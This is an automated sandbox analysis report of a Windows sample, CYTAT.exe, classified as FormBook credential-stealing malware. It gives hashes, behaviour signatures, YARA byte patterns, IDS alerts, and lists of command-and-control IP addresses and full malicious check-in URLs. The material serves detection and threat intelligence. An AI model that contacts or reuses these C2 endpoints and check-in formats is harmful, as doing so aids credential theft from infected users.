
Windows Analysis Report
CYTAT.exe

Overview

General Information

Sample name: CYTAT.exe
Analysis ID: 1518075
MD5: a1eecc39c791b5a57c0e914b116a1672
SHA1: c5deba202f4187bcde6d16af9fb74badafe1abe3
SHA256: 502812cc0e25d2c5e3053cb724b38407b6ba9e2ef6c0631d89879602365fd2a8
Tags: exeuser-adam_zbadam

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • CYTAT.exe (PID: 6380 cmdline: "C:\Users\user\Desktop\CYTAT.exe" MD5: A1EECC39C791B5A57C0E914B116A1672)
    • svchost.exe (PID: 4204 cmdline: "C:\Users\user\Desktop\CYTAT.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • eMNaOgRkIZi.exe (PID: 2432 cmdline: "C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 7472 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • eMNaOgRkIZi.exe (PID: 4052 cmdline: "C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7800 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x1d1cfe:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1b9f2d:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
4.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
4.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\CYTAT.exe", CommandLine: "C:\Users\user\Desktop\CYTAT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CYTAT.exe", ParentImage: C:\Users\user\Desktop\CYTAT.exe, ParentProcessId: 6380, ParentProcessName: CYTAT.exe, ProcessCommandLine: "C:\Users\user\Desktop\CYTAT.exe", ProcessId: 4204, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\CYTAT.exe", CommandLine: "C:\Users\user\Desktop\CYTAT.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CYTAT.exe", ParentImage: C:\Users\user\Desktop\CYTAT.exe, ParentProcessId: 6380, ParentProcessName: CYTAT.exe, ProcessCommandLine: "C:\Users\user\Desktop\CYTAT.exe", ProcessId: 4204, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T11:36:55.380755+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 52103 | 148.72.152.174 | 80 | TCP
2024-09-25T11:37:24.230696+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 52107 | 3.33.130.190 | 80 | TCP
2024-09-25T11:37:37.743830+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 52111 | 172.191.244.62 | 80 | TCP
2024-09-25T11:37:51.714838+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 52115 | 172.96.191.39 | 80 | TCP
2024-09-25T11:38:05.211275+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 52119 | 217.70.184.50 | 80 | TCP
2024-09-25T11:38:19.232099+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 52123 | 63.250.47.40 | 80 | TCP
2024-09-25T11:38:32.552612+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 52127 | 91.184.0.200 | 80 | TCP
2024-09-25T11:38:46.060671+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 52131 | 13.248.169.48 | 80 | TCP
2024-09-25T11:39:13.754391+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 52139 | 43.242.202.169 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T11:36:55.380755+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 52103 | 148.72.152.174 | 80 | TCP
2024-09-25T11:37:24.230696+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 52107 | 3.33.130.190 | 80 | TCP
2024-09-25T11:37:37.743830+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 52111 | 172.191.244.62 | 80 | TCP
2024-09-25T11:37:51.714838+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 52115 | 172.96.191.39 | 80 | TCP
2024-09-25T11:38:05.211275+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 52119 | 217.70.184.50 | 80 | TCP
2024-09-25T11:38:19.232099+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 52123 | 63.250.47.40 | 80 | TCP
2024-09-25T11:38:32.552612+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 52127 | 91.184.0.200 | 80 | TCP
2024-09-25T11:38:46.060671+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 52131 | 13.248.169.48 | 80 | TCP
2024-09-25T11:39:13.754391+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 52139 | 43.242.202.169 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T11:37:16.578015+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52104 | 3.33.130.190 | 80 | TCP
2024-09-25T11:37:19.136334+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52105 | 3.33.130.190 | 80 | TCP
2024-09-25T11:37:21.688958+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52106 | 3.33.130.190 | 80 | TCP
2024-09-25T11:37:30.189995+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52108 | 172.191.244.62 | 80 | TCP
2024-09-25T11:37:32.652322+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52109 | 172.191.244.62 | 80 | TCP
2024-09-25T11:37:35.207083+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52110 | 172.191.244.62 | 80 | TCP
2024-09-25T11:37:44.123012+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52112 | 172.96.191.39 | 80 | TCP
2024-09-25T11:37:46.664263+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52113 | 172.96.191.39 | 80 | TCP
2024-09-25T11:37:49.179941+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52114 | 172.96.191.39 | 80 | TCP
2024-09-25T11:37:57.561999+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52116 | 217.70.184.50 | 80 | TCP
2024-09-25T11:38:00.099887+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52117 | 217.70.184.50 | 80 | TCP
2024-09-25T11:38:02.652253+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52118 | 217.70.184.50 | 80 | TCP
2024-09-25T11:38:11.586095+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52120 | 63.250.47.40 | 80 | TCP
2024-09-25T11:38:14.149666+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52121 | 63.250.47.40 | 80 | TCP
2024-09-25T11:38:16.688710+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52122 | 63.250.47.40 | 80 | TCP
2024-09-25T11:38:24.904088+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52124 | 91.184.0.200 | 80 | TCP
2024-09-25T11:38:27.458436+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52125 | 91.184.0.200 | 80 | TCP
2024-09-25T11:38:30.000561+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52126 | 91.184.0.200 | 80 | TCP
2024-09-25T11:38:38.365794+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52128 | 13.248.169.48 | 80 | TCP
2024-09-25T11:38:40.949790+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52129 | 13.248.169.48 | 80 | TCP
2024-09-25T11:38:43.527376+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52130 | 13.248.169.48 | 80 | TCP
2024-09-25T11:39:06.101770+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52136 | 43.242.202.169 | 80 | TCP
2024-09-25T11:39:08.656855+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52137 | 43.242.202.169 | 80 | TCP
2024-09-25T11:39:11.202053+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 52138 | 43.242.202.169 | 80 | TCP


AV Detection

Source: CYTAT.exe | Avira: detected
Source: http://www.tekilla.wtf/fpzw/?QF4tL=lBP8AZrpnb&7lpPGx=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU | Avira URL Cloud: Label: malware
Source: https://www.elsupertodo.net/2jit/?QF4tL=lBP8AZrpnb&7lpPGx=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQuk | Avira URL Cloud: Label: malware
Source: http://www.tekilla.wtf/fpzw/ | Avira URL Cloud: Label: malware
Source: http://www.omexai.info/7xi5/ | Avira URL Cloud: Label: malware
Source: http://www.omexai.info/7xi5/?7lpPGx=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&QF4tL=lBP8AZrpnb | Avira URL Cloud: Label: malware
Source: http://www.bola88site.one/3qit/ | Avira URL Cloud: Label: malware
Source: CYTAT.exe | ReversingLabs: Detection: 26%
Source: Yara match | File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: CYTAT.exe | Joe Sandbox ML: detected
Source: CYTAT.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eMNaOgRkIZi.exe, 0000000A.00000002.3104267331.00000000009FE000.00000002.00000001.01000000.00000005.sdmp, eMNaOgRkIZi.exe, 0000000D.00000000.1543340144.00000000009FE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: CYTAT.exe, 00000000.00000003.1270333270.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, CYTAT.exe, 00000000.00000003.1269128308.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1379552936.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1377556936.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1473681751.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1478081756.000000000302B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.000000000337E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.00000000031E0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CYTAT.exe, 00000000.00000003.1270333270.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, CYTAT.exe, 00000000.00000003.1269128308.0000000004740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1379552936.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1377556936.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1475859271.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000C.00000003.1473681751.0000000002E28000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1478081756.000000000302B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.000000000337E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3106719686.00000000031E0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000004.00000002.1472771099.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1441411393.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000003.1418262002.00000000008FB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.000000000380C000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000000.1543628726.000000000292C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1913472378.00000000255EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000CEF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3107256962.000000000380C000.00000004.10000000.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000000.1543628726.000000000292C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.1913472378.00000000255EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000004.00000002.1472771099.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1441411393.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000003.1418262002.00000000008FB000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00452492
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00442886
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_004788BD
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose | 0_2_004339B6
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose | 0_2_0045CAFA
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00431A86
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose | 0_2_0044BD27
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose | 0_2_0045DE8F
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_0044BF8B
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 12_2_00A1C2C0 FindFirstFileW,FindNextFileW,FindClose | 12_2_00A1C2C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then xor eax, eax | 12_2_00A09B90
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then pop edi | 12_2_00A22399
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then mov ebx, 00000004h | 12_2_030D04DE

Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52127 -> 91.184.0.200:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52127 -> 91.184.0.200:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52113 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52108 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52122 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52126 -> 91.184.0.200:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52104 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52117 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52110 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52130 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52125 -> 91.184.0.200:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52106 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52109 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52114 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52116 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52105 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52120 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52139 -> 43.242.202.169:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52121 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52139 -> 43.242.202.169:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52123 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52112 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52119 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52119 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52138 -> 43.242.202.169:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52118 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52103 -> 148.72.152.174:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52107 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52103 -> 148.72.152.174:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52123 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52124 -> 91.184.0.200:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52107 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52129 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52115 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52115 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52137 -> 43.242.202.169:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52128 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:52111 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:52111 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:52136 -> 43.242.202.169:80
